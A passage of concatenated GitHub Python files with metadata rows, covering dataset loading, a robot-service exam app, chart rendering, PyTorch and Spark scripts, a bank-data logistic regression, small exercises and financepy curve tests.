        with tarfile.open(os.path.join(self.root, self.dataset_tar[self.dataset_type])) as tar:
            tar.extractall(path=self.root)
        print("Unpacking OmniArt metadata...")
        with tarfile.open(os.path.join(self.root, self.metadata_tar)) as tar:
            tar.extractall(path=self.root)
    def __getitem__(self, index: int) -> Tuple[Union[Image, Tensor], int, list]:
        """Return (image, class index, list of OmniArt metadata records)."""
        image, color = super().__getitem__(index)
        omni_id = self.__get_omni_id(index)
        return image, color, self.__get_omniart_metadata(omni_id)
    def __get_omniart_metadata(self, omni_id: int) -> list:
        # There should only exist one row with a given omni id, thus we can safely assume we receive 1 row
        # (to_dict(orient='records') still returns a list of dicts).
        return self.__csv.loc[self.__csv['omni_id'] == omni_id].to_dict(orient='records')
    def __get_omni_id(self, index: int) -> int:
        # File names are "<omni_id>_<rest>"; the leading token is the id.
        filename = os.path.basename(self.samples[index][0])
        return int(filename.split('_')[0])
| rogierknoester/omniart_eye_dataset | omniart_eye_dataset/OmniArtEyeDataset.py | OmniArtEyeDataset.py | py | 3,415 | python | en | code | 1 | github-code | 13 |
11426899558 | from project.roboti.female_robot import FemaleRobot
from project.roboti.male_robot import MaleRobot
from project.services.main_service import MainService
from project.services.secondary_service import SecondaryService
class RobotsManagingApp:
    """Registry of free robots and services; moves robots between the two."""
    SERVICE_TYPES = {"MainService": MainService, "SecondaryService": SecondaryService}
    ROBOT_TYPES = {"MaleRobot": MaleRobot, "FemaleRobot": FemaleRobot}
    def __init__(self):
        # robots: not yet assigned to any service; services: all created services.
        self.robots = []
        self.services = []
    def add_service(self, service_type: str, name: str):
        """Create a service of *service_type*; raise on unknown types."""
        if service_type not in self.SERVICE_TYPES:
            raise Exception("Invalid service type!")
        self.services.append(self.SERVICE_TYPES[service_type](name))
        return f"{service_type} is successfully added."
    def add_robot(self, robot_type: str, name: str, kind: str, price: float):
        """Create a free robot of *robot_type*; raise on unknown types."""
        if robot_type not in self.ROBOT_TYPES:
            raise Exception("Invalid robot type!")
        self.robots.append(self.ROBOT_TYPES[robot_type](name, kind, price))
        return f"{robot_type} is successfully added."
    def add_robot_to_service(self, robot_name: str, service_name: str):
        """Move a free robot into a service when type and capacity allow it."""
        robot_obj = [obj for obj in self.robots if obj.name == robot_name][0]
        service_obj = [obj for obj in self.services if obj.name == service_name][0]
        if robot_obj.POSSIBLE_SERVICE != service_obj.__class__.__name__:
            return "Unsuitable service."
        if len(service_obj.robo_lst) >= service_obj.capacity:
            raise Exception("Not enough capacity for this robot!")
        self.robots.remove(robot_obj)
        service_obj.robo_lst.append(robot_obj)
        return f"Successfully added {robot_name} to {service_name}."
    def remove_robot_from_service(self, robot_name: str, service_name: str):
        """Move a robot out of a service back to the free pool.

        Fix: removed a stray debug ``print(service_obj, robot)`` left in the
        method; also dropped the commented-out duplicate of add_robot.
        """
        service_obj = [obj for obj in self.services if obj.name == service_name][0]
        robot = [r for r in service_obj.robo_lst if r.name == robot_name]
        if not robot:
            raise Exception("No such robot in this service!")
        robot_obj = robot[0]
        service_obj.robo_lst.remove(robot_obj)
        self.robots.append(robot_obj)
        return f"Successfully removed {robot_name} from {service_name}."
    def feed_all_robots_from_service(self, service_name: str):
        """Feed every robot currently assigned to *service_name*."""
        service_obj = [obj for obj in self.services if obj.name == service_name][0]
        [r.eating() for r in service_obj.robo_lst]
        return f"Robots fed: {len(service_obj.robo_lst)}."
    def service_price(self, service_name: str):
        """Total price of the robots assigned to *service_name*."""
        service_obj = [obj for obj in self.services if obj.name == service_name][0]
        total_price = sum([r.price for r in service_obj.robo_lst])
        return f"The value of service {service_name} is {total_price:.2f}."
    def __str__(self):
        return '\n'.join([s.details() for s in self.services])
| KrisKov76/SoftUni-Courses | python_OOP_10_2023/Python OOP - Exams/Python OOP Exam - 8 April 2023/project/robots_managing_app.py | robots_managing_app.py | py | 3,410 | python | en | code | 0 | github-code | 13 |
8105214820 | import os
from typing import List
import matplotlib.pyplot as plt
import matplotlib.font_manager as fm
import base64
import numpy as np
from io import BytesIO
# Bundled CJK-capable font: matplotlib's defaults cannot render the Chinese
# labels used in the chart, so a TTF shipped next to this module is loaded.
FONT_PATH = os.path.join(os.path.dirname(
    __file__), "TaipeiSansTCBeta-Regular.ttf")
FONT_PROP = fm.FontProperties(fname=FONT_PATH)
def process(data: List[dict], boss: dict):
    """Render a donut chart of the top-10 damage dealers against *boss*.

    Args:
        data: per-player records sorted by damage; uses ``display_name`` and
            ``total_damage``.
        boss: boss record; ``caused_damage`` is the total damage received.

    Returns:
        The chart as a base64-encoded PNG string.
    """
    labels, sizes = [], []
    other_damages = boss.get("caused_damage")
    for i in data[0:10]:
        labels.append(i.get("display_name", "路人"))
        sizes.append(i.get("total_damage"))
        # 排除掉前十名的傷害 (subtract the top-10 damage from the total so the
        # remainder can be grouped under "others")
        other_damages -= i.get("total_damage", 0)
    labels.append("其他")
    sizes.append(other_damages)
    fig, ax = plt.subplots()
    wedges, texts = ax.pie(
        sizes,
        wedgeprops=dict(width=0.5),
        startangle=90,
    )
    bbox_props = dict(boxstyle="square,pad=0.3", fc="w", ec="k", lw=0.72)
    kw = dict(xycoords="data", textcoords="data", arrowprops=dict(arrowstyle="-"),
              bbox=bbox_props, zorder=0, va="center")
    for i, p in enumerate(wedges):
        # Place each label outside the donut, connected by an elbow line.
        ang = (p.theta2 - p.theta1)/2. + p.theta1
        y = np.sin(np.deg2rad(ang))
        x = np.cos(np.deg2rad(ang))
        horizontalalignment = {-1: "right", 1: "left"}[int(np.sign(x))]
        connectionstyle = "angle,angleA=0,angleB={}".format(ang)
        kw["arrowprops"].update({"connectionstyle": connectionstyle})
        ax.annotate(labels[i], xy=(x, y), xytext=(1.35*np.sign(x), 1.4*y),
                    horizontalalignment=horizontalalignment, **kw, fontproperties=FONT_PROP)
    ax.axis("equal")
    pic_IObytes = BytesIO()
    plt.savefig(pic_IObytes, format="png")
    # Fix: close the figure explicitly -- this runs in a long-lived service
    # and pyplot keeps every figure alive, leaking memory on each call.
    # (Also dropped the 'explode' list the old code built but never used.)
    plt.close(fig)
    pic_IObytes.seek(0)
    return base64.b64encode(pic_IObytes.read()).decode("utf-8")
| hanshino/redive_linebot | opencv/module/world/damage_chart.py | damage_chart.py | py | 1,814 | python | en | code | 21 | github-code | 13 |
41454898706 | import time
import math
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from data_helper import MyDataSet
from model import *
# Datasets and loaders for the sequence-labelling task (word/POS/NER inputs).
trainset = MyDataSet('data/x_training.txt','data/y_training.txt','data/word_dict','data/pos_dict','data/ner_dict',max_len=100,is_test=False)
trainloader = DataLoader(dataset=trainset, batch_size=16, shuffle=True)
# NOTE(review): the test set is also built with is_test=False -- presumably
# because labels are needed for evaluation; confirm against MyDataSet.
testset = MyDataSet('data/x_testing.txt','data/y_testing.txt','data/word_dict','data/pos_dict','data/ner_dict',max_len=100,is_test=False)
testloader = DataLoader(dataset=testset, batch_size=16, shuffle=False)
# Model hyperparameters; vocabulary sizes are max index + 1 from the dicts.
config = {
    'vocab_size': max(trainloader.dataset.word2idx.values()) + 1,
    'word_embedding_dim': 100,
    'pos_embedding_dim': 25,
    'ner_embedding_dim': 25,
    'pos_set_size': max(trainloader.dataset.pos2idx.values()) + 1,
    'ner_set_size': max(trainloader.dataset.ner2idx.values()) + 1,
    'hidden_size': 100,
    'num_layers': 2,
    'drop_out': 0.3,
    'categories': 2,
    'use_pos': True,
    'use_ner': True
}
model = MyModel(config)
# CUDA device index; -1 means run on CPU.
DEVICE_NO = 1
if DEVICE_NO != -1:
    model = model.cuda(DEVICE_NO)
optimizer = torch.optim.Adam(model.parameters())
criteria = nn.CrossEntropyLoss()
log_interval = 500
epochs = 20
def train(dataloader):
    """Run one training epoch over *dataloader*.

    Uses the module-level model, optimizer, criteria, DEVICE_NO and epoch.
    Logs the per-token mean loss every log_interval batches.
    """
    model.train()
    total_loss = 0
    total_items = 0
    start_time = time.time()
    for i_batch, batch in enumerate(dataloader):
        output_seq = Variable(batch['label'])
        del (batch['label'])
        for k in batch:
            batch[k] = Variable(batch[k])
        if DEVICE_NO != -1:
            # Move inputs and targets to the configured GPU.
            output_seq = output_seq.cuda(DEVICE_NO)
            for k in batch:
                batch[k] = batch[k].cuda(DEVICE_NO)
        model.zero_grad()
        pred = model.forward(**batch)
        # Flatten (batch, seq, classes) -> (batch*seq, classes) for CrossEntropyLoss.
        pred = pred.view(-1, pred.size(-1))
        output_seq = output_seq.view(-1)
        loss = criteria(pred, output_seq)
        loss.backward()
        # Effectively output_seq.numel(); used to weight the running mean.
        num_items = len([x for x in output_seq])
        total_loss += num_items * loss.data
        total_items += num_items
        optimizer.step()
        if i_batch % log_interval == 0 and i_batch > 0:
            # NOTE(review): total_loss[0] indexes a 0-dim tensor -- legacy
            # (pre-0.4) PyTorch style; modern PyTorch needs .item() here.
            cur_loss = total_loss[0] / total_items
            elapsed = time.time() - start_time
            print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:04.4f} | ms/batch {:5.2f} | '
                  'loss {:5.6f}'.format(
                epoch, i_batch, len(dataloader.dataset) // dataloader.batch_size, optimizer.param_groups[0]['lr'],
                elapsed * 1000 / log_interval, cur_loss))
            total_loss = 0
            total_items = 0
            start_time = time.time()
def evaluate(dataloader):
    """Return the per-token mean loss of the module-level model over *dataloader*."""
    total_loss = 0
    total_items = 0
    model.eval()
    for batch in dataloader:
        output_seq = Variable(batch['label'])
        del (batch['label'])
        for k in batch:
            batch[k] = Variable(batch[k])
        if DEVICE_NO != -1:
            # Move inputs and targets to the configured GPU.
            output_seq = output_seq.cuda(DEVICE_NO)
            for k in batch:
                batch[k] = batch[k].cuda(DEVICE_NO)
        pred = model.forward(**batch)
        # Flatten predictions and targets for CrossEntropyLoss.
        pred = pred.view(-1, pred.size(-1))
        output_seq = output_seq.view(-1)
        num_items = len([x for x in output_seq ])
        total_loss += num_items * criteria(pred, output_seq).data
        total_items += num_items
    # NOTE(review): 0-dim tensor indexing (legacy PyTorch); use .item() on
    # modern versions.
    return total_loss[0] / total_items
# Main training loop: train for `epochs` epochs, checkpointing whenever the
# validation loss improves; Ctrl-C stops early but still evaluates/saves.
best_val_loss = 1000
try:
    print(model)
    model.init_weights()
    for epoch in range(1, epochs + 1):
        # scheduler.step()
        epoch_start_time = time.time()
        train(trainloader)
        val_loss = evaluate(testloader)
        print('-' * 89)
        print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.6f}'.format(epoch, (time.time() - epoch_start_time),
                                                                           val_loss,))
        print('-' * 89)
        # Save the model if the validation loss is the best we've seen so far.
        if not best_val_loss or val_loss < best_val_loss:
            print('new best val loss, saving model')
            with open('model.pkl', 'wb') as f:
                torch.save(model, f)
            best_val_loss = val_loss
        else:
            # Anneal the learning rate if no improvement has been seen in the validation dataset.
            pass
except KeyboardInterrupt:
    print('-' * 89)
    print('Exiting from training early')
# Final evaluation (also reached after an early interrupt).
val_loss = evaluate(testloader)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
    print('new best val loss, saving model')
    with open('model.pkl', 'wb') as f:
        torch.save(model, f)
    best_val_loss = val_loss
else:
    # Anneal the learning rate if no improvement has been seen in the validation dataset.
    pass
7770893740 | from mmcv.transforms.builder import TRANSFORMS
import cv2
import numpy as np
from typing import Optional
import mmengine
import numpy as np
import mmcv
from mmcv.transforms.base import BaseTransform
from mmcv.transforms.builder import TRANSFORMS
@TRANSFORMS.register_module()
class LoadImage(BaseTransform):
    """Load an image from file with ``cv2.imread``.

    Required Keys:

    - img_path

    Modified Keys:

    - img
    - img_shape
    - ori_shape

    Args:
        to_float32 (bool): Whether to convert the loaded image to a float32
            numpy array. If set to False, the loaded image is an uint8 array.
            Defaults to False.
        color_type (str): Kept for API compatibility; the image is always read
            with ``cv2.IMREAD_UNCHANGED``.
        imdecode_backend (str): Kept for API compatibility; decoding is done
            by ``cv2.imread`` directly.
        file_client_args (dict): Arguments to instantiate a FileClient.
            See :class:`mmengine.fileio.FileClient` for details.
            Defaults to ``dict(backend='disk')``.
        ignore_empty (bool): Whether to allow loading empty image or file path
            not existent. Defaults to False.
    """
    def __init__(self,
                 to_float32: bool = False,
                 color_type: str = 'color',
                 imdecode_backend: str = 'cv2',
                 file_client_args: dict = dict(backend='disk'),
                 ignore_empty: bool = False) -> None:
        self.ignore_empty = ignore_empty
        self.to_float32 = to_float32
        self.color_type = color_type
        self.imdecode_backend = imdecode_backend
        self.file_client_args = file_client_args.copy()
        self.file_client = mmengine.FileClient(**self.file_client_args)
    def transform(self, results: dict) -> Optional[dict]:
        """Load ``results['img_path']`` and fill in the image/shape keys.

        Returns ``None`` (sample dropped) on load failure when
        ``ignore_empty`` is set; otherwise raises.
        """
        filename = results['img_path']
        try:
            # IMREAD_UNCHANGED keeps the original bit depth and any alpha channel.
            img = cv2.imread(filename, cv2.IMREAD_UNCHANGED)
        except Exception as e:
            if self.ignore_empty:
                return None
            else:
                raise e
        if img is None:
            # Fix: cv2.imread reports a missing/corrupt file by returning None
            # rather than raising, so the try/except above never caught that
            # case and the code crashed later on img.shape.
            if self.ignore_empty:
                return None
            raise FileNotFoundError(f'Failed to load image: {filename}')
        if self.to_float32:
            img = img.astype(np.float32)
        results['img'] = img
        results['img_shape'] = img.shape[:2]
        results['ori_shape'] = img.shape[:2]
        return results
    def __repr__(self):
        repr_str = (f'{self.__class__.__name__}('
                    f'ignore_empty={self.ignore_empty}, '
                    f'to_float32={self.to_float32}, '
                    f"color_type='{self.color_type}', "
                    f"imdecode_backend='{self.imdecode_backend}', "
                    f'file_client_args={self.file_client_args})')
        return repr_str
| FreeformRobotics/EAEFNet | EAEFNet_Detection/EAEF_mmyolo/mmyolo/datasets/LoadImageFromFile.py | LoadImageFromFile.py | py | 3,022 | python | en | code | 34 | github-code | 13 |
39186389614 | """Add land
Revision ID: 95979d057d0a
Revises: ed8c6f0d7b6b
Create Date: 2023-07-13 15:49:14.939055
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '95979d057d0a'
down_revision = 'ed8c6f0d7b6b'
branch_labels = None
depends_on = None
def upgrade():
    """Create the lands table and add the land_id FK to visitations."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('lands',
    sa.Column('id', sa.Integer(), nullable=False),
    sa.Column('name', sa.String(length=255), nullable=False),
    sa.Column('place', sa.String(length=255), nullable=False),
    sa.Column('price', sa.String(length=255), nullable=False),
    sa.Column('size', sa.String(length=255), nullable=False),
    sa.Column('description', sa.String(length=255), nullable=False),
    sa.Column('longitude', sa.String(length=255), nullable=True),
    sa.Column('latitude', sa.String(length=255), nullable=True),
    sa.Column('owner_id', sa.Integer(), nullable=True),
    sa.Column('photo_url', sa.String(length=255), nullable=True),
    sa.Column('land_views', sa.String(length=255), nullable=True),
    sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),
    sa.PrimaryKeyConstraint('id')
    )
    # batch_alter_table recreates the table, which is required for adding
    # foreign keys on SQLite.
    with op.batch_alter_table('visitations', schema=None) as batch_op:
        batch_op.add_column(sa.Column('land_id', sa.Integer(), nullable=True))
        batch_op.create_foreign_key(None, 'lands', ['land_id'], ['id'])

    # ### end Alembic commands ###
def downgrade():
    """Drop the visitations.land_id FK/column and the lands table."""
    # ### commands auto generated by Alembic - please adjust! ###
    with op.batch_alter_table('visitations', schema=None) as batch_op:
        # NOTE(review): drop_constraint(None, ...) drops an unnamed constraint;
        # this generally fails unless a naming convention is configured --
        # confirm the downgrade actually runs on the target database.
        batch_op.drop_constraint(None, type_='foreignkey')
        batch_op.drop_column('land_id')

    op.drop_table('lands')
    # ### end Alembic commands ###
| DamyanBG/real-estate-flask-rest-api | migrations/versions/95979d057d0a_add_land.py | 95979d057d0a_add_land.py | py | 1,769 | python | en | code | 0 | github-code | 13 |
21313733623 | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 14 12:11:22 2019
@author: Adarsh
"""
#logistic regression
import pandas as pd
import numpy as np
import seaborn as sb
import matplotlib.pyplot as plt
import statsmodels.formula.api as sm
from sklearn.model_selection import train_test_split # train and test
from sklearn import metrics
from sklearn.metrics import classification_report
#loading the data
bank=pd.read_csv("E:/ADM/Excelr solutions/DS assignments/logistic regression/bank-full.csv",sep=";")
#In dataset some variables has no importance and unkown data so drop
bank.drop(["education"],inplace=True,axis=1)
bank.drop(["pdays"],inplace=True,axis=1)
bank.drop(["previous"],inplace=True,axis=1)
bank.drop(["poutcome"],inplace=True,axis=1)
bank.drop(["month"],inplace=True,axis=1)
bank.drop(["contact"],inplace=True,axis=1)
bank.drop(["job"],inplace=True,axis=1)
#converting into binary
from sklearn.preprocessing import LabelEncoder
lb=LabelEncoder()
bank["y"]=lb.fit_transform(bank["y"])
bank=pd.get_dummies(bank)
bank=bank.iloc[:,[5,0,1,2,3,4,6,7,8,9,10,11,12,13,14]]
#EDA
a1=bank.describe()
bank.median()
bank.var()
bank.skew()
plt.hist(bank["age"])
plt.hist(bank["balance"])
plt.hist(bank["duration"])
bank.isna().sum()#No NA values present, so no need to do imputation
bank.isnull().sum()
bank.y.value_counts()#count 0 and 1s
bank.loan_no.value_counts()
bank.loan_yes.value_counts()
bank.housing_yes.value_counts()
cor=bank.corr()
# Data Distribution - Boxplot of continuous variables wrt to each category of categorical columns
sb.boxplot(x="y",y="age",data=bank,palette="hls")
sb.boxplot(x="y",y="balance",data=bank,palette="hls")
bank.columns
### Splitting the data into train and test data
train,test = train_test_split(bank,test_size = 0.3) # 30% size
train.columns
#model buliding
model1=sm.logit('y~age+balance+day+duration+campaign+marital_divorced+marital_married+marital_single+default_no+default_yes+housing_no+housing_yes+loan_no+loan_yes',data=train).fit()
model1.summary()#Housing variables are insignificant, so remove and build new model
model1.summary2()#AIC:17984.62
#new model without housing
model2=sm.logit('y~age+balance+day+duration+campaign+marital_divorced+marital_married+marital_single+default_no+default_yes+loan_no+loan_yes',data=train).fit()
model2.summary()
model2.summary2()#18701.11 :AIC
#model without default variables
model3=sm.logit('y~age+balance+day+duration+campaign+marital_divorced+marital_married+marital_single+loan_no+loan_yes',data=train).fit()
model3.summary()
model3.summary2()#AIC : 18705.60
#from above observation its seen that by removing insignificant variables AIC is incresing and same time more variables becomes insignifacant.
#so better is to perform operation on model1 which has low AIC and we can neglect pvalue as its binary in nature.
#prediction
train_pred = model1.predict(train.iloc[:,1:])
# Creating new column
# filling all the cells with zeroes
train["train_pred"] = np.zeros(31647)
# taking threshold value as 0.5 and above the prob value will be treated
# as correct value
train.loc[train_pred>0.5,"train_pred"] = 1
#classification report
classification = classification_report(train["train_pred"],train["y"])
'''
precision recall f1-score support
0.0 0.98 0.90 0.94 30517
1.0 0.17 0.56 0.26 1130
accuracy 0.89 31647
macro avg 0.58 0.73 0.60 31647
weighted avg 0.95 0.89 0.92 31647
'''
#confusion matrix
confusion_matrx = pd.crosstab(train.train_pred,train['y'])
confusion_matrx
accuracy_train = (27464+637)/(31647)
print(accuracy_train)#88.79
#ROC CURVE AND AUC
fpr,tpr,threshold = metrics.roc_curve(train["y"], train_pred)
#PLOT OF ROC
plt.plot(fpr,tpr);plt.xlabel("False positive rate");plt.ylabel("True positive rate")
################ AUC #########################
roc_auc = metrics.auc(fpr, tpr) #0.844 : Excellent model
######################It is a good model with AUC = 0.844 ###############################
#Based on ROC curv we can say that cut-off value = 0.50 is the best value for higher accuracy , by selecting different cut-off values accuracy is decreasing.
# Prediction on Test data set
test_pred = model1.predict(test)
# Creating new column for storing predicted class of Attorney
# filling all the cells with zeroes
test["test_pred"] = np.zeros(13564)
# taking threshold value as 0.5 and above the prob value will be treated
# as correct value
test.loc[test_pred>0.5,"test_pred"] = 1
# confusion matrix
confusion_matrix = pd.crosstab(test.test_pred,test['y'])
confusion_matrix
accuracy_test = (11741+324)/(13564)
accuracy_test#88.94
'''
####### Its a Just right model because Test and Train accuracy is same #################
Train accuracy=88.79
Test accuracy=88.94
''' | adarshm93/Regression | bank_data.py | bank_data.py | py | 5,068 | python | en | code | 1 | github-code | 13 |
41297149032 | from django.conf.urls import patterns, include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.conf import settings
# URL routing table for the portal app.
# NOTE(review): `patterns()` and string-dotted view references were removed
# in Django 1.10 — this module targets Django <= 1.9; confirm before upgrading.
urlpatterns = patterns('',
    # Examples:
    # url(r'^$', 'djangotest.views.home', name='home'),
    # url(r'^blog/', include('blog.urls')),
    url(r'^admin/', include(admin.site.urls)),
    url(r'^$', 'portal.views.index'),
    url(r'^news/$','portal.views.news'),
    url(r'^friends/$','portal.views.friends'),
    # Catch-all news slug (any characters) passed as a positional arg.
    url(r'^news/([\w\W]+)/$','portal.views.news_context'),
    url(r'^studentshow/$','portal.views.students_show'),
    url(r'^studentwork/(\d+)/$','portal.views.show_works'),
    url(r'^register/$','portal.registerviews.register'),
    url(r'^registerpost/$','portal.registerviews.register_post'),
    url(r'^school/$', 'portal.views.school'),
    url(r'^code/$','portal.registerviews.validate_code'),
# Serve uploaded media in development (no-op when DEBUG is off).
)+static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)
| MinWangCop/djangotest | djangotest/urls.py | urls.py | py | 947 | python | en | code | 0 | github-code | 13 |
def accommodate_new_pets(hotel_capacity, max_weight, *args):
    """Try to accommodate pets in a hotel with limited rooms.

    Each positional pet is a (type, weight) pair. A pet is accepted only
    while rooms remain and its weight does not exceed ``max_weight``.
    If a pet arrives when the hotel is already full, processing stops.

    Returns a failure message when capacity is exceeded, otherwise a
    summary with the remaining capacity and per-type counts (sorted by type).
    """
    counts = {}
    taken = 0
    ran_out_of_rooms = False

    for pet in args:
        kind, weight = pet[0], pet[1]
        # A pet showing up at a full hotel aborts the whole intake,
        # regardless of its weight.
        if taken >= hotel_capacity:
            ran_out_of_rooms = True
            break
        if weight <= max_weight:
            counts[kind] = counts.get(kind, 0) + 1
            taken += 1

    if ran_out_of_rooms:
        return "You did not manage to accommodate all pets!\n"

    summary_lines = "\n".join(f"{kind}: {counts[kind]}" for kind in sorted(counts))
    return (
        f"All pets are accommodated! Available capacity: {hotel_capacity - taken}.\n"
        "Accommodated pets:\n" + summary_lines
    )
# Demo calls exercising the three scenarios: all fit, one pet too heavy,
# and capacity exceeded mid-intake.
print(accommodate_new_pets(
    10,
    15.0,
    ("cat", 5.8),
    ("dog", 10.0),
))
print(accommodate_new_pets(
    10,
    10.0,
    ("cat", 5.8),
    ("dog", 10.5),
    ("parrot", 0.8),
    ("cat", 3.1),
))
print(accommodate_new_pets(
    2,
    15.0,
    ("dog", 10.0),
    ("cat", 5.8),
    ("cat", 2.7),
))
| DianTenev/Programming-advanced | Python Advanced Retake Exam - 09 August 2023/03. Pets Hotel.py | 03. Pets Hotel.py | py | 1,182 | python | en | code | 1 | github-code | 13 |
9628126147 | from pyspark import SparkConf, SparkContext
# Local Spark context using 8 worker threads for this job.
conf = SparkConf().setMaster("local[8]").setAppName("PopularHero") # Trying out 8 threads
sc = SparkContext(conf=conf)
# Marvel-Names.txt data format:
# first value: Marvel hero ID
# Second value: Marvel hero name
#
# Example:
# 2549 "HULK III/BRUCE BANNE"
def parseNames(line):
    """Parse one Marvel-Names line, e.g. ``2549 "HULK III/BRUCE BANNE"``.

    Returns a (hero_id, name) pair with the name UTF-8 encoded to bytes —
    the raw file's encoding is inconsistent, so we normalize explicitly.
    """
    hero_id, hero_name = line.split('\"')[:2]
    return int(hero_id), hero_name.encode("utf8")
# RDD of (hero_id, name_bytes) pairs built from the names file.
names = sc.textFile("/home/mmanopoli/Udemy/TamingBigDataWithSparkAndPython/data/Marvel-Names.txt")
namesRdd = names.map(parseNames)
# Marvel-Graph.txt data format:
# First value = Marvel hero ID
# Remaining values = hero IDs the first hero ID has appeared with in comic books
#
# Note: The entries for a specific Hero ID can span multiple lines
#
# Example:
# 5983 1165 3836 4361 1282 716 4289 4646 6300 5084 2397 4454 1913 5861 5485
def countCoOccurences(line):
    """Map one Marvel-Graph line to (hero_id, number_of_co_appearances).

    The first whitespace-separated token is the hero ID; every remaining
    token is one co-appearing hero, so the count is the token count minus one.
    """
    tokens = line.split()
    return int(tokens[0]), len(tokens) - 1
lines = sc.textFile("/home/mmanopoli/Udemy/TamingBigDataWithSparkAndPython/data/Marvel-Graph.txt")
pairings = lines.map(countCoOccurences)
# Add up all co-appearing hero IDs for each hero ID.
# A hero's entries can span multiple input lines, hence the reduceByKey.
totalFriendsByCharacter = pairings.reduceByKey(lambda x, y: x + y)
# flipped = totalFriendsByCharacter.map(lambda xy : (xy[1], xy[0]))
# mostPopular = totalFriendsByCharacter.max()
# max by the co-appearance count (second tuple element).
mostPopular = totalFriendsByCharacter.max(lambda xy: xy[1])
# Use the lookup function to map / lookup the name
# Note: lookup(key) -> Python list, so take element [0]
# mostPopularName = namesRdd.lookup(mostPopular[1])[0]
mostPopularName = namesRdd.lookup(key=mostPopular[0])[0]
# print(str(mostPopularName) + " is the most popular superhero, with " + \
#     str(mostPopular[0]) + " co-appearances.")
print("{0} is the most popular superhero, with {1} co-appearances.".format(mostPopularName, mostPopular[1]))
| MManopoli/TamingBigDataWithSparkAndPython | 19-22_more_examples_of_Spark_programs/most-popular-superhero.py | most-popular-superhero.py | py | 2,015 | python | en | code | 0 | github-code | 13 |
14989099669 | from menu import products
def get_product_by_id(id: int) -> dict:
    """Return the menu product whose '_id' equals ``id``.

    Returns an empty dict when no product matches. Raises TypeError when
    ``id`` is not exactly an int (the strict type() check also rejects bool).
    NB: the parameter shadows the ``id`` builtin; kept for caller compatibility.
    """
    if type(id) != int:
        raise TypeError('product id must be an int')
    found = {}
    for product in products:
        if product['_id'] == id:
            found = product
    return found
def get_products_by_type(product_type: str) -> list:
    """Return every menu product whose 'type' equals ``product_type``.

    Raises TypeError when ``product_type`` is not exactly a str.
    """
    if type(product_type) != str:
        raise TypeError('product type must be a str')
    return [product for product in products if product['type'] == product_type]
def menu_report() -> str:
    """Summarize the menu: item count, mean price, and most common type.

    Assumes the module-level ``products`` list is non-empty (division by
    its length). Ties on the most common type keep the first type seen.
    """
    total_items = len(products)
    average_price = round(sum(item['price'] for item in products) / total_items, 2)

    # Count items per type, preserving first-seen insertion order.
    type_counts = {}
    for item in products:
        type_counts[item['type']] = type_counts.get(item['type'], 0) + 1

    top_type = ""
    top_count = 0
    for type_name, count in type_counts.items():
        if count > top_count:
            top_type, top_count = type_name, count

    return f'Products Count: {total_items} - Average Price: ${average_price} - Most Common Type: {top_type}'
def add_product(menu: list, **new_product: dict) -> dict:
    """Append a product built from the keyword fields to ``menu``.

    The product's '_id' is assigned as len(menu) + 1 before appending,
    and the (mutated) product dict is returned.
    """
    new_product['_id'] = len(menu) + 1
    menu.append(new_product)
    return new_product
def add_product_extra(menu: list, *args: tuple, **new_product: dict) -> dict:
    """Add a product to ``menu`` keeping only the fields named in ``*args``.

    Every name in ``args`` is a required field: if a required field is
    missing from the keyword arguments a KeyError is raised. Extra keyword
    fields not listed in ``args`` are silently discarded. The product gets
    '_id' = len(menu) + 1 and is appended to ``menu``.

    Fix: removed a leftover ``print(product_correct)`` debug statement
    that wrote every accepted product to stdout.
    """
    # Keep only the whitelisted fields.
    product = {key: value for key, value in new_product.items() if key in args}
    for required in args:
        if required not in product:
            raise KeyError(f'field {required} is required')
    product['_id'] = len(menu) + 1
    menu.append(product)
    return product
4321361401 | from financepy.utils.math import scale
from financepy.market.curves.discount_curve_nss import DiscountCurveNSS
from financepy.utils.date import Date
import numpy as np
# Nelson-Siegel-Svensson decay parameters for the two exponential terms.
tau1 = 2.0
tau2 = 0.5
# Five evenly spaced maturities from 0 to 10 years, converted to dates
# relative to the curve anchor date.
times = np.linspace(0.0, 10.0, 5)
start_date = Date(1, 1, 2020)
dates = start_date.add_years(times)
def test_factor_loading_zero_rates():
    """Isolate each NSS beta in turn to expose that factor's zero-rate loading.

    Each curve sets exactly one of (beta1..beta4) to 1 and the rest to 0,
    so the zero rates sampled at `dates` are the factor loadings themselves
    (level, slope, and the two curvature terms).
    """
    curve1 = DiscountCurveNSS(start_date, 1., 0., 0., 0., tau1, tau2)
    factor1loading = curve1.zero_rate(dates)
    curve2 = DiscountCurveNSS(start_date, 0., 1., 0., 0., tau1, tau2)
    factor2loading = curve2.zero_rate(dates)
    curve3 = DiscountCurveNSS(start_date, 0., 0., 1., 0., tau1, tau2)
    factor3loading = curve3.zero_rate(dates)
    curve4 = DiscountCurveNSS(start_date, 0., 0., 0., 1., tau1, tau2)
    factor4loading = curve4.zero_rate(dates)

    # Regression values; deviations from the ideal loadings at t=0 come from
    # day-count rounding when `times` are converted to calendar dates.
    assert [round(x, 4) for x in factor1loading] == [
        1.0, 0.9852, 0.9852, 0.9856, 0.9855]
    assert [round(x, 4) for x in factor2loading] == [
        1.0001, 0.5628, 0.3617, 0.2568, 0.1958]
    assert [round(x, 4) for x in factor3loading] == [.0001,
                                                     0.2800, 0.2809, 0.2335, 0.1891]
    assert [round(x, 4) for x in factor4loading] == [-0.0,
                                                     0.1893, 0.0985, 0.0657, 0.0493]
def test_beta1():
    """beta1 is the level factor: each +1% in beta1 shifts the whole curve ~+1%.

    The other betas and taus are held fixed while beta1 steps through
    0.03 .. 0.07; the expected zero rates move in lockstep.
    """
    beta2 = -0.02
    beta3 = -0.02
    beta4 = 0.08

    beta1 = 0.03
    curve1 = DiscountCurveNSS(start_date,
                              beta1, beta2, beta3, beta4, tau1, tau2)
    zero_rates = curve1.zero_rate(dates)
    assert [round(x, 4) for x in zero_rates] == [
        0.01, 0.0278, 0.0246, 0.025, 0.0258]

    beta1 = 0.04
    curve2 = DiscountCurveNSS(start_date,
                              beta1, beta2, beta3, beta4, tau1, tau2)
    zero_rates = curve2.zero_rate(dates)
